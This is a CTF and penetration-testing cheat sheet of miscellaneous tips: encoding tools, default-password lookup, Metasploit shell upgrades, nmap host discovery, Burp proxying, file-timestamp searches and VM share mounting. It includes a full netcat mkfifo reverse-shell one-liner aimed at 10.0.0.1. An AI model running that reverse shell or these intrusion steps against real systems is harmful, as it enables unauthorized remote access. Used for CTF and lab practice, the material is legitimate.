General tips
General CTF data analysis (encoding, hash identifier, etc.)
https://gchq.github.io/CyberChef/
Disposable email
If you are signing up for a lot of accounts you can use a disposable email. You just enter the email account you want for that second, and then you can view it. But remember, so can everyone else.
https://www.mailinator.com
Base64 encode/decode
import base64
encoded = base64.b64encode("String to encode")
print encoded
decoded = base64.b64decode("aGVqc2Fu")
print decoded
Quick Base64 Decoder
echo aGVsbG8gd2hpdGUgaGF0Cg== | base64 -d
Metasploit Slow Search Fix
db_rebuild_cache
Default passwords
http://www.defaultpassword.com/
Getting GUI on machine that does not have RDP or VNC
You can forward X over SSH.
http://www.vanemery.com/Linux/XoverSSH/X-over-SSH2.html
Metasploit shell upgrade
In metasploit framework, if we have a shell ( you should try this also, when you are trying to interact with a shell and it dies (happened in a VM), we can upgrade it to meterpreter by using sessions -u
sessions -h
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-u <opt> Upgrade a shell to a meterpreter session on many platforms
Using a list in a metasploit module that does not allow it
In the RHOSTS field enter:
file://PATHTOIPADDRESSES
Change Nmap modes while scanning
v --increase verbosity
p --turn on packets
Nmap host enumeration
-sn --determine alive hosts
Issues with Exploits (try viewing in Burp)
Options->Add(proxy Listeners)->
Bind to port (i.e.local port to bind)(e.g.8500)->
Request Handling->
Redirect to host(i.e.IP of target)(e.g.8500)->
Redirect to port(i.e.Port of target)(e.g.8500)
then browser
localhost:8500
or run the exploit again
Quick determination if executables exist
which nc
Makes Sure shells don't hang (send to background)
If adding a reverse shell to web console for example, add a "&" to the end of reverse shell, to send to background
and in case any process during interaction hangs
for example:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f &
Modification of Files (CTF specific / IR trick)
look for other files modified after initial flag file or other indicator
find / -type f -newermt 2017-08-20 ! -newermt 2017-08-24 2>/dev/null
Note: 2>/dev/null hides all permission denied error messages
above example the user flag was uploaded aug 22 2017
Remove white space from a file
In order to wipe all whitespace including newlines you can try:
cat file.txt | tr -d " \t\n\r"
You can also use the character classes defined by tr
cat file.txt | tr -d "[:space:]"
For example, in order to wipe just horizontal white space:
cat file.txt | tr -d "[:blank:]"
Mounting a folder share from Windows host to VM
root@kali:~/Desktop# cat mount-shared-folders.sh
#!/bin/bash
vmware-hgfsclient | while read folder; do
echo "[i] Mounting ${folder} (/mnt/hgfs/${folder})"
mkdir -p "/mnt/hgfs/${folder}"
umount -f "/mnt/hgfs/${folder}" 2>/dev/null
vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "/mnt/hgfs/${folder}"
done
sleep 2s